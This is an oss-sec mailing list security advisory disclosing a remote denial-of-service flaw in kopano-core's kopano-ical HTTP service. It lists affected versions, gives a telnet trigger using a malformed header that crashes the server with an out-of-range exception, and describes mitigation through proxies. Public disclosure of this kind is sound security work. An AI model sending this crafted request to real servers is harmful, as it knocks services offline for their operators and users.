oss-sec mailing list archives
kopano-core 11.0.1.77: Remote DoS with out-of-bounds access
From: Jan Engelhardt <jengelh () inai de>
Date: Fri, 2 Apr 2021 10:26:29 +0200 (CEST)
Initial publication, no CVE number yet. # Affected versions * kopano-core 11.0.1 * kopano-core 8.7.20 * it is believed this affects all other versions too, including 10.0.7, 9.1.0, and zarafa 7.2.6. The "kopano-ical" program implements a network service/trivial HTTP server. It fails to properly check HTTP headers, and with a crafted request, can be exploited to drive the process into an exception and have it terminate. # Trigger » ./kopano-ical -F & » telnet localhost 8000 Trying ::1... Connected to localhost. Escape character is '^]'. GET / HTTP/1.0 Foo: Connection closed by foreign host. terminate called after throwing an instance of 'std::out_of_range' what(): basic_string::substr: __pos (which is 6) > this->size() (which is 5) # Mitigation In conjunction with a proxy, the issue does not occur as they often filter lines (LF->CRLF, giving an extra byte). Tested ones: nginx-1.19.8 squid-4.14 apache2-2.4.46 tinyproxy-1.10.0
Current thread:
- kopano-core 11.0.1.77: Remote DoS with out-of-bounds access Jan Engelhardt (Apr 02)
- Re: kopano-core 11.0.1.77: Remote DoS with out-of-bounds access Robert Scheck (Apr 24)